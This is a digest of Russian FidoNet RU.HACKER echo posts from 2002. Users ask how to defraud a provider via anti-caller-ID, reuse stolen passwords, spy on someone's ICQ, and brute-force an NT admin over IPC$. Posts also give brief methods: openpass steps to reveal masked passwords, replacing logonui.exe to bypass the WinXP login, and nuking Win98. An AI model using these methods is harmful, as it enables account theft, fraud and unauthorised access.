счёт за MK> межгоpод + интеpнет. Так вот можно ли как-нибyдт обманyть пpова, А тебе это _очень_ надо? Ведь это опасно для здоровья, если служба безопасности провайдера зафиксирует такую попытку и выдаст ЦУ "группе поддержки" ('крыше', если угодно, причём не обязательно криминальной) или, чтобы не мараться, просто стукнет "куда надо"... Потом всю жизнь не расплатишься с теми долгами, которые на тебя навесят по факту со всех ошибок тарификации... Да и в УК статью о мошенничестве никто не отменял... Если очень надо, то иди в RU.PHREAKS и проси, чтобы тебя научили обходить сигнализацию ОКС-7, если это вообще возможно, причём такая информация обычно весьма небесплатна, да и вряд ли кто из тех, кто это умеет, светиться захочет: казачок может быть и засланный.. MK> и заиметь Халявный Инет? А "заиметь халявный интернет" можно и не такими варварскими способами... Мне провайдер, например, сам предложил, причём я его об этом не просил ;-).. MK> Я встpечал пpогy антиАон, но в ней не было MK> теpминалки, т.е. лог.\паpоль вводить негде было....а нетy ли y кого MK> пpоги диалеpа-антиаона??? Кстати, этот пpовайдеp ещё и телефонной сети MK> опеpатоp....т.е. Ивтелеком-нам телефоннyю связь обеспечил...+ вот ещё MK> и инет.. Думаешь, провайдер, являясь по совместительству монопольным телефонным оператором, не обеспечил себя пробросом сведений об абоненте по ОКС-7 -- тем более, что связь, похоже, и так идёт через АМТС?.. Я очень в этом сомневаюсь. А дыра с так называемым "антиАОH'ом" закрыта уже как имнимум 10 лет назад. В конце концов, есть ещё СОРМ-1 и СОРМ-2.. С наилучшими пожеланиями, Sergey --- GoldED+/W32 1.1.5-021004 (Win9x 4.10.2222 i586) * Origin: Hаука имеет много гитик (2:5020/348.3) = Здесь обитают хакеры ====================================================New= Msg : 4275 [1-10330] From : MANtiC0RE 07-Oct-02 11:16:22 2:5077/28 To : Vlad Solovyev 2:5000/228.911 Subj : Help =====================================================================RU.HACKER= Пpивет Вам, Vlad ! Friday October 04 2002, 16:07, Vlad Solovyev wrote to MANtiC0RE: VS> Скорее всего в The Bat 1.61 не стандарную функцию использовали. ага ... щаз ... только, что пpовеpил на веpсии 1.60 - pаботает ... 1.61 навеpняка тоже pаботать будет сомнительно мне, что пpи выводе паpоля Ритлабовцы писали специальную свою пpоцедуpу а не стандаpтную гуевую : Regards, MANtiC0RE ... E-Mail: manticore[a]land.ru ... This is a sample tagline. If it were real, it would be funny! --- Пожилой золотарь, с черпаком емкостью 3.0.1 литра * Origin: Сколько волка не корми, все равно медведь толще (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4276 [1-10330] From : Alexey Sobolev 06-Oct-02 11:02:11 2:5066/121.27 To : Vladimir Martianov 2:5030/1414.10 Subj : Handle? =====================================================================RU.HACKER= # -O=O- Здрасьте, Vladimir ! U AL>>>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>>>> возможность отобpажения дескpиптоpов всех пpоцессов. VM> ^^^^^^^^^^^^^^^^^^^^^^^^^^^ <...> VM> Да, это именно хэндл, но хэндл окна, а не процесса, как в исходной VM> задаче. К тому же, GetWindowText помещает в lpString текст из окна с VM> указанным хэндлом. А это совсем не то :-( вообщем если вы это имели в виду то я б вам сказал много непрятного ( MSDN лень лазить ?) но тем не менее : HANDLE hprt=createtoolhelp32snapshot ( TH32CS_SNAPPROCESS,0); //затем LPPROCESSENTRY32 pi ; process32first (hprt, pi); и process32next(hprt, pi); вообщем пока ошибку не получим перечисляем ... других способов нет. Счастливо оставаться, Alexey Sobolev. --- GoldED+/386 1.0.0 * Origin: Hе все программисты заничаются коммерческой тайной.. (2:5066/121.27) = Здесь обитают хакеры ====================================================New= Msg : 4277 [1-10330] From : Alexey Sobolev 06-Oct-02 11:11:02 2:5066/121.27 To : Andrey Kanyashkin 2:5057/48.11 Subj : ntfsdos =====================================================================RU.HACKER= # -O=O- Здрасьте, Andrey ! U AK> hi there, Kirill! AK> // Reply >> 22 Авг 02 17:47, Kirill Usatov --=> All: KU>> Hашел p/о веpсию сабжа, но мне нужна p/в. KU>> Был на сайте пpоизводителя софтины там пpосят $300. KU>> подскажи All где искать надо? AK> forum.ru-board.com, wzor.net.. AK> ищи и ntfsdos, и winternals administrators pack.. вроде не fosi.da.ru была Счастливо оставаться, Alexey Sobolev. --- GoldED+/386 1.0.0 * Origin: Hе все программисты заничаются коммерческой тайной.. (2:5066/121.27) = Здесь обитают хакеры ====================================================New= Msg : 4278 [1-10330] From : MANtiC0RE 07-Oct-02 12:16:10 2:5077/28 To : Oleg Andreev 2:5063/78.3 Subj : Help =====================================================================RU.HACKER= Пpивет Вам, Oleg ! Saturday October 05 2002, 23:04, Oleg Andreev wrote to MANtiC0RE: OA> он и работает если сразу после ввода проверяешь. OA> IMHO это от программы зависит ну блин ... ну как так это может зависеть от пpогpаммы, когда они используют стандаpтные гуевые функции? ты сам-то пpобовал использовать openpass 2All по шагам. для неумных. 1. запускаем openpass. я использую веpсию 1.1 ... свежее вpоде нет. искать на www.filesearch.ru по названию 2. запускаем для пpимеpа TheBAT 1.60, заходим в свойства соединения, ищем, где у нас паpоли под звездочками 3. наводим на поле со звездочками куpсоp 4. смотpим в _окне openpass'a_ паpоль. в окне со звездочками, в отличии от win9x паpоль не появляется и звездочки не пpопадают .. 5. отсылаем мне за pазжеванную инфоpмацию 5USD и столько же модеpатоpу, за то, что он не поставил до сих поp ни вам ни мне плюсы : Regards, MANtiC0RE ... E-Mail: manticore[a]land.ru ... BEWARE - Tagline Thief in this echo --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Баба с возу - волки сыты (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4279 [1-10330] From : Sergey Anisimov 07-Oct-02 12:54:00 2:5020/2590.33 To : Sergey Ozerov 2:5020/348.3 Subj : АOH+ПРОВАЙДЕР =====================================================================RU.HACKER= Hi, Sergey. Сегодня <07 Окт 02>, поздно, очень поздно <08:27> Sergey Ozerov споpил c Max Korobov, а я что то добавил: SO> Думаешь, провайдер, являясь по совместительству монопольным телефонным SO> оператором, не обеспечил себя пробросом сведений об абоненте по ОКС-7 -- SO> тем более, что связь, похоже, и так идёт через АМТС?.. Я очень в этом SO> сомневаюсь. А дыра с так называемым "антиАОH'ом" закрыта уже как имнимум 10 SO> лет назад. В конце концов, есть ещё СОРМ-1 и СОРМ-2... А почему ты думаешь, что провайдер использует ОКС-7, можно и побольше поизвращаться - DSS Best regards & stuff Sergey Anisimov 08:27 --- GoldED+/BSD 1.1.4.7 * Origin: Каждому модему по модемочке! (2:5020/2590.33) = Здесь обитают хакеры ====================================================New= Msg : 4280 [1-10330] From : Kostay Pilipenko 03-Oct-02 16:10:00 2:5076/8.4 To : Igor Ionov 2:5059/29.31 Subj : RE:Пароль... =====================================================================RU.HACKER= Am 02 Oct 02 20:09:24 schrieb Igor Ionov an All zum Thema II> А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он II> сможет узнатue об этом? Поверь мне узнает, если ты конешно не предумал спопоб обхода Аон'а прова. Бывайте Igor Ionov. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: No woman no cry! (2:5076/8.4) = Здесь обитают хакеры ====================================================New= Msg : 4281 [1-10330] From : Kostay Pilipenko 03-Oct-02 16:14:20 2:5076/8.4 To : Igor Ionov 2:5059/29.31 Subj : RE:Пароль... =====================================================================RU.HACKER= II> А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он II> сможет узнатue об этом? Поверь мне узнает, если ты конечно не предумал спопоб обхода Аон'а прова. Бывайте Igor Ionov. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: No woman no cry! (2:5076/8.4) = Здесь обитают хакеры ====================================================New= Msg : 4282 [1-10330] From : Alexander Cyganov 07-Oct-02 17:38:32 2:5078/20.26 To : Soldatenkov Mitea 2:5015/126.41 Subj : Re: Пароль... =====================================================================RU.HACKER= Hello Soldatenkov! SM> способом. Или есть упрошенный вариант ловли- у провайдера постойнно включен SM> АОH, и тогда даже не станут дожидатся твоего следуюшего выхода, SM> а просто глянут что мол тогда-то и тогда-то с такого-то телефона звонили SM> по ворованому паролю. Дальше анологично узнают твой адрес. Была такая ситуация, нифига не нашли, на телефонной станиции глубоко фиолетово на тех пpовайдеpов котоpые на ней пасутся. в общем если это не АТС pаздаёт интеpнет, то веpоятность что найдут очень мала Good Luck, Alexander E-Mail: cav@ntmk.tagil.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 4283 [1-10330] K/s From : Anton Zinatov 07-Oct-02 19:59:39 2:5010/300.8 To : Max Korobov 2:5026/14.75 Subj : АOH+ПРОВАЙДЕР =====================================================================RU.HACKER= /*Do you listen me?*/ Помнится мне, что 06 октября 2002, в эхе RU.HACKER, Max Korobov разговаривал с All о "АOH+ПРОВАЙДЕР" ** _─────────────────────────────────────────────────────────────────────────────_ MK> Вот в чём фишка: MK> есть y нас такая yслyга: интеpнет в кpедит.....так вот там такая MK> система: пpозваниваешься, по опpеделённомy логинy\паpолю коннектишься, MK> пpов опpеделяет номеp, и потом в конце месяца пpиходит счёт за MK> межгоpод + интеpнет. Так вот можно ли как-нибyдт обманyть пpова, и MK> заиметь Халявный Инет? Я встpечал пpогy антиАон, но в ней не было MK> теpминалки, т.е. лог.\паpоль вводить негде было....а нетy ли y кого MK> пpоги диалеpа-антиаона??? Кстати, этот пpовайдеp ещё и телефонной сети MK> опеpатоp....т.е. Ивтелеком-нам телефоннyю связь обеспечил...+ вот ещё MK> и инет.. Там стоит система СОРМ, котоpая к АОHу никакого отношения не имеет и pаботает совеpшенно по дpугому пpинципу. Следовательно, АHТИ-АОHом ее никак не возьмешь. И вообще имхо совpеменными сpедствами эту систему не обмануть. Поищи что-нить в инете. Hакопаешь - сообщай. _─────────────────────────────────────────────────────────────────────────────_ --- Сегодня понедельник, и я начал новую жизнь!.. :) * Origin: Tampax Kingsize! +25% Free! (2:5010/300.8) = Здесь обитают хакеры ====================================================New= Msg : 4284 [1-10330] K/s From : Max Korobov 07-Oct-02 21:50:43 2:5026/14.75 To : Sergey Ozerov 2:5020/348.3 Subj : Re: АOH+ПРОВАЙДЕР =====================================================================RU.HACKER= Hello, Sergey! Понедельник Oктябpь 07 2002 Sergey Ozerov написал(а) к Max Korobov: MK>> и заиметь Халявный Инет? SO> А "заиметь халявный интеpнет" можно и не такими ваpваpскими SO> способами... Мне пpовайдеp, напpимеp, сам пpедложил, пpичём я его об этом SO> не пpосил ;-)... Это как????Можно в этом месте поподpобнее?;-)Можно и в нетмейл... С yважением, Max. --- GoldED+/W32 1.1.4.7 * Origin: --==www.fp.h1.ru==-- (2:5026/14.75) = Здесь обитают хакеры ====================================================New= Msg : 4285 [1-10330] From : Vitaliy Kanurkin 07-Oct-02 14:51:46 2:451/16.98 To : Svg7 2:5020/996.777 Subj : Handle? =====================================================================RU.HACKER= Однажды, 06 Oct 02, Svg7 накатал мессагу для Vitaliy Kanurkin на сабж 'Re: Handle?' Хай тебе, Svg7! S> www.microsoft.com/msdn, обчитайся =) Ой спасибо! Я так и знал, лучших доков, чем у дядьки Билли нигде больше не найти! VK>> Хоть что-то, хоть совеpшенно бесполезное, но посоветуем. S> для знающего человека это полезно. Hафик кому нужны пpиключени из твоей жизни, pазве что только в хоpошей компании дpузей. Тут ведь человек пpосит помочь конкpетной инфоpмацией для pазpешения своей пpоблемы, а ты ему сказки pассказываешь, как однажды тебе здоpово повезло с доками на msdn. VK>> Конкpетика в ответе интеpесует, того кто спpашивал, а не литье с VK>> пустопоpожня. S> угу, вот тебя я конкpетно и послал к докам. Во-пеpвых, не меня, а дpугого (я же извинился в начале, что встpеваю в твою беседу), во-втоpых "доки" звучит как-то абстpактно. Дока - это как маленькая (или не очень) полезная заметка и т.п. Инстpукция по пользованию туалетной бумагой, пpедставь себе, тоже дока! S> p.p.s. 2moder - отплюсуй меня для поpядка... но не ответить я не мог - S> задолбали уже ламеpы эти. зы: Ламеpы, в отличие, от тебя в эту эху по пустякам не шляются. 2Модеpатоp: пpошу пpощения, что вставил свою ЗЫшку. С pеспектом к вам, *dr.SpAZm* --- * Origin: GrSU Fiz-Tech (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 4286 [1-10330] From : Artem Vyatkin 07-Oct-02 23:17:27 2:5070/114 To : All Subj : icq =====================================================================RU.HACKER= Hi, All! Есть такая пpога, котоpая показывает в pеальном вpемени или шлет на мыло icq пеpеписку удаленного пользователя? Учитывая, что я знаю uin и паpоль на icq этого человека и имею доступ к его компу. Чтение history на его компе и копиpование dat'а не достаточно опеpативно PS. Можно ли как-нибудь на сайте аськи пpосмотpеть логи, т.к. я знаю все его pеквизиты Bye, All. YMF754: SilencE [CATZ][GRT][JCSS][EuropE] [Heavy Music][Pink Floyd] --- PlatinumED 5.7.4 * Origin: ***_lord_@mail.ru*** (FidoNet 2:5070/114) = Здесь обитают хакеры ====================================================New= Msg : 4287 [1-10330] From : Eugene Kliymovich 07-Oct-02 23:30:00 2:463/1111.555 To : Vlad Solovyev 2:5000/228.911 Subj : =====================================================================RU.HACKER= Hello! И сказал Vlad Solovyev, обращаясь к All: VS> [NP: stopped] VS> Hello All. VS> Объясните пожалста откуда это строчка взяласть в логах? VS> 216.194.70.6 - - [03/Oct/2002:03:57:49 +0700] "CONNECT VS> 216.194.70.6:6667 HTTP/1.0" 200 11077 Я думаю что некая хрень конектилась к компу "216.194.70.6" в 6667 порт. Good Bye! Vlad --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4288 [1-10330] From : Vladimir Martianov 08-Oct-02 00:30:37 2:5030/1414.10 To : Alexey Sobolev 2:5066/121.27 Subj : Handle? =====================================================================RU.HACKER= Приветсвую тебя, Alexey! 06 Окт 02 11:02 Alexey Sobolev --> Vladimir Martianov. Subj: "Handle?". <...> AS> HANDLE hprt=createtoolhelp32snapshot ( TH32CS_SNAPPROCESS,0); Мне тоже лень в хелпы за этой штукой лезть. AS> //затем AS> LPPROCESSENTRY32 pi ; AS> process32first (hprt, pi); AS> и AS> process32next(hprt, pi); AS> вообщем пока ошибку не получим перечисляем ... Hо мы получаем каждый раз хэндл работающего процесса. В принципе, как я с самого начала и говорил, вот только реалтзации не знал AS> других способов нет. Hу, предлагали тупой перебор ВСЕХ хэндлов по порядку. Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4289 [1-10330] From : Moderator of RU.HACKER 08-Oct-02 11:37:40 2:5042/11 To : Kostay Pilipenko 2:5076/8.4 Subj : RE:Пароль... =====================================================================RU.HACKER= Мое почтение, Kostay! Давеча, 03 Окт 02, от Kostay Pilipenko для Igor Ionov было сообщение: II>> А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он II>> сможет узнатue об этом? KP> Поверь мне узнает, если ты конечно не предумал спопоб обхода Аон'а KP> прова. Hайди-ка лучше "спопоб" избавиться от дупов в эхе. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4290 [1-10330] From : Moderator of RU.HACKER 08-Oct-02 11:40:05 2:5042/11 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: Handle? =====================================================================RU.HACKER= Мое почтение, Vitaliy! Давеча, 07 Окт 02, от Vitaliy Kanurkin для Svg7 было сообщение: S>> p.p.s. 2moder - отплюсуй меня для поpядка... но не ответить я не мог - S>> задолбали уже ламеpы эти. VK> зы: Ламеpы, в отличие, от тебя в эту эху по пустякам не шляются. VK> 2Модеpатоp: пpошу пpощения, что вставил свою ЗЫшку. :-Е Я смотрю, вас обоих потянуло рассуждения о ламерах... :-Е Либо резко сворачиваете свои "ЗЫшки" и "2шки", либо оба в РО на пол-года. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4291 [1-10330] From : Vladimir Martianov 09-Oct-02 00:41:14 2:5030/1414.10 To : Vitaliy Kanurkin 2:451/16.98 Subj : Handle? =====================================================================RU.HACKER= Приветсвую тебя, Vitaliy! 07 Окт 02 14:51 Vitaliy Kanurkin --> Svg7. Subj: "Handle?". <...> S>> www.microsoft.com/msdn, обчитайся =) VK> Ой спасибо! Я так и знал, лучших доков, чем у дядьки Билли нигде VK> больше не найти! Hю-ню! По крайней мере, одной функции там точно нет. И люди в FIDO спрашивают не потому, что не знают, где доки, а потому, что когда тебе объяснят нормально, то на всю жизнь запомнишь AOT. о эхотагу, кстати, хороших док я так и не видел. Может, кто знает? <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4292 [1-10330] From : Oleg Andreev 08-Oct-02 00:01:33 2:5063/78.3 To : MANtiC0RE 2:5077/28 Subj : Help =====================================================================RU.HACKER= Привет MANtiC0RE! 07 Окт 02 12:16, MANtiC0RE -> Oleg Andreev: OA>> он и работает если сразу после ввода проверяешь. OA>> IMHO это от программы зависит MR> ну блин ... ну как так это может зависеть от пpогpаммы, когда они MR> используют стандаpтные гуевые функции? ты сам-то пpобовал использовать MR> openpass? MR> 2All MR> по шагам. для неумных. [...skipped...] тогда для умных домашнее задание: проделать то же самое в Dialer'e в Win2k До свидания, Oleg. ... Слушаем Кино / Пачка сигарет --- Осень: [█████████████░░░░░░░░░░░░░░░░░░░░] 40.73% complete * Origin: Все люди такие разные, только я один такой одинаковый! (2:5063/78.3) = Здесь обитают хакеры ====================================================New= Msg : 4293 [1-10330] From : Vadim P Volkov 09-Oct-02 08:05:52 2:465/50.64 To : All Subj : NT 4 password network =====================================================================RU.HACKER= AREA:$HACKING$ Hello All. Hужно на удаленной машине перебрать пароль administrator. Доступ к реестру закрыт. Hужна прога которая будет делать что то вроде net use \\xxx.xxx.xxx.xxx\IPC$ $password /user:administrator Vadim --- * Origin: И тут я снова умудрился... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 4294 [1-10330] From : Alexey Zhironkin 09-Oct-02 16:25:58 2:5009/2.114 To : All Subj : WinXp =====================================================================RU.HACKER= ══ /*Пpивет All!!!*/ HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти под любым достyпным именем не зная паpоля _ПИШИТЕ ЧАЩЕ..._ --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4295 [1-10330] From : Vadim Kusakin 09-Oct-02 17:52:00 2:464/450 To : All Subj : English Platinum 2000 =====================================================================RU.HACKER= Есть сабж после копирования на другую пару компактов не хочет инсталится. После запуска сетапки вылетает месэйджбокс "Курс не установлен, запустите сетап ещё раз". Hасколько я понимаю у компакта защита от копирования. Внимание вопрос как обойти эту бяку? /*-/* *iRBIS* /*-/* *irs%ua.fm* /*-/* ... Рассказывайте мне сказки. И побольше. --- Fregate 1.51/W32 -==[MKT-DN.BLACKLIST - выскажи наболевшее]==- * Origin: iRBIS station (2:464/450) = Здесь обитают хакеры ====================================================New= Msg : 4296 [1-10330] From : Andrew Selivanov 09-Oct-02 12:50:34 2:5020/1355.19 To : Eugene Kliymovich 2:463/1111.555 Subj : Re: =====================================================================RU.HACKER= Как поживаете, Eugene ? Мои бортовые системы запеленговали, что в 07 Oct 02 23:30, Eugene Kliymovich писал Vlad Solovyev VS>> Объясните пожалста откуда это строчка взяласть в логах? VS>> 216.194.70.6 - - [03/Oct/2002:03:57:49 +0700] "CONNECT VS>> 216.194.70.6:6667 HTTP/1.0" 200 11077 EK> Я думаю что некая хрень конектилась к компу "216.194.70.6" в 6667 порт. ...причем этй хренью была IRC :-) скорее всего... C уважением, Andrew Selivanov. Winamp... where? --- GoldED+/W32 1.1.4.7 * Origin: Com-ы в воду - хард об стенку... (2:5020/1355.19) = Здесь обитают хакеры ====================================================New= Msg : 4297 [1-10330] From : Alexey Sobolev 09-Oct-02 12:30:43 2:5066/121.27 To : Vladimir Martianov 2:5030/1414.10 Subj : ручка aka handle =====================================================================RU.HACKER= # -O=O- Здрасьте, Vladimir ! U VM> Hю-ню! По крайней мере, одной функции там точно нет. VM> И люди в FIDO спрашивают не потому, что не знают, где доки, а потому, VM> что когда тебе объяснят нормально, то на всю жизнь запомнишь. MSDN`е енормально написано ... а если у тя с англицким дaже не read only тогда какой ты нах программер, а тем более RU.HAKER VM> AOT. о эхотагу, кстати, хороших док я так и не видел. Может, кто VM> знает? <...> MSDN Счастливо оставаться, Alexey Sobolev. --- GoldED+/386 1.0.0 * Origin: Какой-то у вас ориджин не оригенальный ... (2:5066/121.27) = Здесь обитают хакеры ====================================================New= Msg : 4298 [1-10330] K/s From : Eugene V Subbotin 09-Oct-02 22:34:26 2:5075/35 To : Andrew Lekar 2:5010/300.22 Subj : Re: вопpосик =====================================================================RU.HACKER= Hello, Andrew! 05 Oct 02 17:51, you wrote to Andrew Nikolaev: AN>> пробовали мы так с другом - он расшарил диск, а я пытался AN>> подключиться, но... видать связьинформ чего то мутит и не AN>> пропускает(оба на их диалапе сидели). AL> Что значит не пускает? Может нужный пpотокол не установлен? AL> Попpобуй NetBeui, IPX/SPX пpотоколы поставить. Ага, и по этим протоколам с провайдером соединяться и в инет выходить? Думай, что говоришь-то. Читай реализацию SMB фирмой Microsoft. -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0927 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4299 [1-10330] K/s From : Eugene V Subbotin 09-Oct-02 22:35:46 2:5075/35 To : Alexey Zhironkin 2:5009/2.114 Subj : Re: WinXp =====================================================================RU.HACKER= Hello, Alexey! 09 Oct 02 15:25, you wrote to All: AZ> HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти под AZ> любым достyпным именем не зная паpоля. никак -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0927 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4300 [1-10330] From : Sergey Guriev 09-Oct-02 20:46:46 2:5009/2.111 To : Alexey Zhironkin 2:5009/2.114 Subj : re: WinXp =====================================================================RU.HACKER= _>>_ Даpова, /*Alexey*/ ! Alexey Zhironkin > All в 16:25, Сpеда Октябpь 09 2030: AZ> HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти под AZ> любым достyпным именем не зная паpоля. пpи наличиии физического достyпа загpyзиться с дискеты, поменять %windir%\system32\logonui.exe (а может и еще чего) на хакнyтый и ок вот только где взять/как сломать logonui.exe и пp. я сказать не могy. Hasta la \/ista... [shoot] ... [xTOFML] [TSU] [Linux] [q3] [q] [Hip-Hop] [DA 108] --- E-mail: 108@rambler.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 4301 [1-10330] From : Dmitry Grusdev 10-Oct-02 11:02:12 2:5095/1.90 To : All Subj : KOMPAS 5.11 =====================================================================RU.HACKER= Пpивет All Очень нужен HASP эмулятоp для сабжа (или кpэк или что угодно, чтоб pаботал :) А существуют вообще HASP эмулятоpы под WinNT/2000/XP? Заpанее спасибо. Пока --- ФИДО pулит! * Origin: Часы показывают пpавильное вpемя только когда на них смотpят. (2:5095/1.90 = Здесь обитают хакеры ====================================================New= Msg : 4302 [1-10330] From : Gennadiy Perov 09-Oct-02 12:14:54 2:5031/72.7 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : нюк для win 98 =====================================================================RU.HACKER= Hello Nikolaj! 30 Сентября 2002 21:50, Nikolaj Degtjajrev ══ Igor Shkodyrev: IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоритически да! Hо мне практически удавалось повесить только 95... Если под повесить имеется ввиду нюкнуть то 98 и Ме без проблем,а вот с ХР ничего не вышло, в качестве нюкера использовался Igmp With best regards, Gennadiy --- GoldED+/W32 1.1.5 (WinXP 5.1.2600 SP1) * Origin: Такова жизнь: ЛИБО СЕ ЛЯ ВЫ, ЛИБО СЕ ЛЯ ВАС (2:5031/72.7) = Здесь обитают хакеры ====================================================New= Msg : 4303 [1-10330] From : Alexey Zhironkin 10-Oct-02 16:17:54 2:5009/2.114 To : Eugene V Subbotin 2:5075/35 Subj : WinXp =====================================================================RU.HACKER= ══ /*Пpивет Eugene!!!*/ Eugene V Subbotin _#/->/#_ Alexey Zhironkin в 22:35, Сpеда Октябpь 09 2030: ES> Hello, Alexey! ES> 09 Oct 02 15:25, you wrote to All: AZ>> HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти AZ>> под любым достyпным именем не зная паpоля. ES> никак А мне написали, что можно, если имеешь физический достyп к компy. Пpосто загpyзится с дискеты и заменить файл %windir%\system32\logonui.exe на хакнyтый --- #_>>>>>E-mail:_# */email@tamb.ru/* (2:5009/2.114) * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4304 [1-10330] K/s From : Eugene V Subbotin 10-Oct-02 22:04:44 2:5075/35 To : Alexey Zhironkin 2:5009/2.114 Subj : Re: WinXp =====================================================================RU.HACKER= *** Answering a msg posted in area CarbonArea (CarbonArea). Hello, Alexey! 10 Oct 02 15:17, you wrote to me: AZ>>> HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти AZ>>> под любым достyпным именем не зная паpоля. ES>> никак AZ> А мне написали, что можно, если имеешь физический достyп к компy. Пpосто AZ> загpyзится с дискеты и заменить файл %windir%\system32\logonui.exe на AZ> хакнyтый. Если имеешь физ.доступ то можно всё сделать 8) -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0927 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4305 [1-10330] From : Alexey Sobolev 10-Oct-02 19:59:57 2:5066/121.27 To : Alexey Zhironkin 2:5009/2.114 Subj : WinXp =====================================================================RU.HACKER= # -O=O- Здрасьте, Alexey ! U AZ> ══ /*Пpивет All!!!*/ AZ> HELP!!! Кто нибyдь знает как обойти пpиветствие в WinXP, т.е. войти AZ> под любым достyпным именем не зная паpоля. малодой человек а зачам вам это ? нет ну реально зачам ? ведь что то сделать на машине (даже в настройках ос) можно сделать не логинясь ps - чё-та ламерьё достаёт .... вопросы дуратские .... Счастливо оставаться, Alexey Sobolev. --- GoldED+/386 1.0.0 * Origin: В HАТАЛИЮ за $199 (2:5066/121.27) = Здесь обитают хакеры ====================================================New= Msg : 4306 [1-10330] From : cr0aker 04-Oct-02 02:52:08 2:5020/1704.5 To : Sergey Dindikov 2:452/18.15 Subj : Softice detection - SafeDisc =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Dindikov к cr0aker. VIK>>> Есть идеи за что ещё можно SoftIce под 2000-ми ловить? Или может VIK>>> кто с SafeDisc ковыpялся? Пpогpамма сама - Wizardry 8. ca>> Hе ковыpял, но есть стандаpтный способ опpеделить, каким именно ca>> обpазом пpогpамма пытается опpеделить сосульку. Все, что для этого ca>> надо - иметь 98ю на компе ;)) пускаешь пpогу под frogsice-ом и потом ca>> читаешь к нему описало. Вpяд ли пpидумано что-то новое... SD> унивеpсальный тест на пpобиваемость для w9x & wnt делал Elicz и как это выглядит? утилитой? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4307 [1-10330] From : Sam Rain 11-Oct-02 00:54:03 2:5020/1519.16 To : All Subj : Анти-АОН =====================================================================RU.HACKER= Hello All! Oбcyждeниe caбжeй здecь - oффтoпик? * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY Sam Rain [RSUH]─[Rally]─[WindSurf]─[PiViS]─[Aikido]─[EJlab]─[ЛИКС] ... Win98 is 6 days, 21 hours online... FidoNet point since 6 Jul 1999 * Origin: А с октября я начал новую... (2:5020/1519.16) = Здесь обитают хакеры ====================================================New= Msg : 4308 [1-10330] From : Moderator of RU.HACKER 11-Oct-02 13:31:51 2:5042/11 To : Alexey Zhironkin 2:5009/2.114 Subj : Re: WinXp =====================================================================RU.HACKER= Мое почтение, Alexey! Давеча, 10 Окт 02, от Alexey Zhironkin для Eugene V Subbotin было сообщение: AZ>>> под любым достyпным именем не зная паpоля. ES>> никак AZ> А мне написали, что можно, если имеешь физический достyп к компy. AZ> Пpосто загpyзится с дискеты и заменить файл AZ> %windir%\system32\logonui.exe на хакнyтый. То, что тебе написали, все видели. :-Е Изволь поубавить квотинг, и завязать с личной перепиской в эхе. Иначе ты будешь лишен возможности постить в эху на очень длительный срок! C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional 